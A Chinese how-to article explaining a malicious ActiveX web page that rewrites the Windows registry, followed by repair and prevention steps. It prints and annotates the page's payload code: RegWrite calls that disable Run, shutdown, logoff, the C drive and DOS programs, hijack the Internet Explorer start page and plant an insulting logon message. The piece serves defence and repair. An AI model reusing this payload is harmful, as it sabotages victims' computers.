浏览网页注册表被修改之迷及解决办法

  浏览网页会被修改注册表?千真万确!如果你去浏览过下面的网页:http://www.某某.com/default.htm ,你真有生不如死的感觉!

进入该网页会被:

  1.修改开始菜单

  1)禁止“关闭系统”
  2)禁止“运行”
  3)禁止“注销”

  2.隐藏C盘——你的C盘找不到了

  3.禁止使用注册表编辑器regedit

  4.禁止使用DOS程序

  5.使系统无法进入“实模式”

  6.禁止运行任何程序

  7.将IE浏览器的首页改为http://www.某某.com/,收藏夹中也被加入该网址。

  那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。

注:下面代码是将你的IE默认连接首页改为http://www.某某.com/
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Start Page", "http://www.某某.com/");

注:以下是该网页修改受害者的注册表项所用的招数

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoClose", 01, "REG_BINARY");
注:使受害者系统没有“关闭系统”项

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
注:使受害者系统没有“注销”项

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
注:使受害者系统没有逻辑驱动器C

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\WinOldApp\\ Disabled","REG_BINARY");
注:禁止运行所有的DOS应用程序;

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
注:使系统不能启动到“实模式”(传统的DOS模式)下;

又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeCaption", "呜啦啦...");
注:这些代码会使窗口的标题是“呜啦啦…”

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界");
注:上面一行是会在窗口中显示出来的文字

注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦...");
注:到上面一行为止,完成了对受害者的注册表的所有修改!

注:下面代码用来将其网页增加到受害者的收藏夹中

var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}

注:下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk(loc, "找到感觉www.某某.com", "http://www.某某.com");

  由于代码很简单,又加了注释,相信你已经看明白是怎么回事了。那么如果不小心进入该网页,并且已经中招了该怎么办呢?别急,下面给你列出了解决的办法。

受害用户的修复方法:

  1:对于Win9x用户,建议在电脑启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的、正常的注册表。

  2:对于Win2000用户,把以下内容copy下来,存为unlock.reg文件,选带命令行的安全模式,用命令regedit unlock.reg导入,如何重启机器就OK了。

unlock.reg文件内容如下:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"Disabled"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"

预防办法:

  1.要避免中招,关键是不要轻易去一些自己并不了解的站点。

  2.在IE设置中将ActiveX插件和控件、Java脚本等全部禁止

  3.可以通过升级到最新的病毒库,来预防该类恶意网页的侵害。

  4.既然该网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁:禁止修改注册表,这样就可以达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打开这把“锁”!

  加锁方法如下:

  (1)运行注册表编辑器regedit.exe;
  (2)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器regedit.exe。

  解锁方法如下:

  用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

  存盘。你就有了一把解锁的钥匙了!如果要使用注册表编辑器,则双击unlock.reg即可。要注意的是,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!

说明:对于“万花谷”网页的恶意代码带来的破坏,也可按上面所提的方法来预防,中招后也可参考上面的方法解决。另,KV3000对“万花谷”可完全恢复,对本文介绍的网页破坏系统现象,则无法安全恢复。

(0)

相关推荐

  • 浏览网页注册表被修改之迷及解决办法

    浏览网页会被修改注册表?千真万确!如果你去浏览过下面的网页:http://www.某某.com/default.htm ,你真有生不如死的感觉! 进入该网页会被: 1.修改开始菜单 1)禁止"关闭系统" 2)禁止"运行" 3)禁止"注销" 2.隐藏C盘--你的C盘找不到了 3.禁止使用注册表编辑器regedit 4.禁止使用DOS程序 5.使系统无法进入"实模式" 6.禁止运行任何程序 7.将IE浏览器的首页改为http://

  • Oracle表空间不足的两种解决办法

    首先查询表空间的大小以及文件路径地址 select tablespace_name, file_id, file_name,round(bytes/(1024*1024),0) total_space from dba_data_files order by tablespace_name; 解决方案一 //修改表空间大小(32000可改为想要的数值) alter database datafile '要修改的数据文件地址' resize 32000m; 解决方案二 //新增数据文件 ALTER

  • 用VBScript实现对Windows注册表的修改详解

    大名鼎鼎的WSH听说过吗? 它就是Windows Script Host的缩写形式,WSH是Windows平台的脚本指令,它的功能十分强大,并且它还是利用语法结构简单.易学易用且功能强大的JScript和VBScript脚本语言,来实现其卓越的功能的,除了本文介绍的修改注册表之外,它还可以访问Excel文件,也能与网络沟通,当然它最大的优势莫过于它能与操作系统沟通,而修改注册表只是它与操作系统沟通的冰山一角.正是它有如此诸多的优点与实用性,正倍受很多Windows用户的青睐,本文就为大家介绍一二

  • 巧用注册表轻松修改Win 2k/XP的默认刷新率

    下面介绍的修改方法只包括对Windows注册表的编辑,因此不需要运行任何来源不明的第三方应用程序. 理论上讲,这种修改方法将与显示驱动程序/适配器无关,因为它修改的是显示器的设置值,而不是显示驱动程序/适配器本身. 重要提示:在修改之前,请确认你的显示器支持你所希望采用的分辨率下的刷新率!后果自负! 假定你已经正确地安装了你的显示器(显示器驱动程序支持你所想要的垂直刷新率,在这个案例里为75Hz),并且你的是"普通的"系统(没有启用多显示器支持等等),请照下面讲的做: 打开注册表编辑器

  • Windows注册表中修改UAC(用户账号控制)及批处理脚本

    注册表路径: HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System 键说明: ConsentPromptBehaviorAdmin:通知强度级别 EnableLUA:是否关闭UAC PromptOnSecureDesktop:桌面是否变黑 1:UAC高 ConsentPromptBehaviorAdmin:2 EnableLUA:1 PromptOnSecureDesktop:1 2:UAC中 C

  • JS和jQuery使用submit方法无法提交表单的原因分析及解决办法

    JS和jQuery使用submit方法无法提交表单的原因分析及解决办法

    昨天,在做一个表单异步提交内容的时候,遇到很奇怪的问题,submit()方法无法进行提交,每次提交都是把 当前给刷新了,网络抓包发现,每次都是 get方式去获取 当前页面,完全没有post 请求,想着以前 遇上这样的问题 都是因为 表单中 有 name 或者 id 这些命名跟submit 有冲突,但是检查了几次,始终没有发现 名字冲突,所以这个可能性被排除. 平常自己做触发按钮,基本不用a 标签,但是昨天不知道什么 问题,竟然用了 a 而且还给了 href 为空,由于这个a 的class 有多个

  • php.ini save_handler 修改不生效的解决办法

    php5.3.3以前php-fpm还没有被php收录,配置php基本都在php.ini里面,php5.3.3及以后,除了在php.ini配置以外,还可以在php-fpm.conf里面配置. 多个地方都可以配置的话,就存在一个优先级.php-fpm.conf优先级比php.ini高. 1,修改/etc/php-fpm.conf,或者,/etc/php-fpm.d/*.conf,或者,/usr/local/php/etc/php-fpm.conf ; Set session path to a di

  • js下在password表单内显示提示信息的解决办法

    经典有人要这个代码,考虑到password中输入的内容会显示为*号,所以要想办法解决*的问题.当初想用setAttribute动态修改type属性达到效果,再ff下测试成功,但没想到setAttribute对type属性的修改在ie中无效.最终采用背景图片的方式解决了这个.即为password设定一个背景图片,图片文字为提示信息 如:<img src="http://files.jb51.net/upload/20070819124037566.gif" />, 当鼠标放上

  • mysql关联两张表时的编码问题及解决办法

    Mysql关联两张表时,产生错误提示Illegal mix of collations 1.先用工具把数据库.两张表的编码方式改变 2.这步很重要,需要改变字段的编码方式. ALTER TABLE `表名` CHANGE `dev_chancode` `字段` VARCHAR(32) CHARACTER SET gbk NOT NULL; 总结:在建表时一定注意统一的编码方式,后续搞来搞去超级麻烦. 如何解决MySQL表编码转换问题 将待导出的数据表的表结构导出(可以用Phpmyadmin.my

  • Android下修改SeekBar样式的解决办法

    SeekBar配置文件:Xml代码 复制代码 代码如下: <SeekBar              android:id="@+id/player_seekbar"             android:layout_width="245px"             android:layout_height="25px"             android:progressDrawable="@drawable/see

随机推荐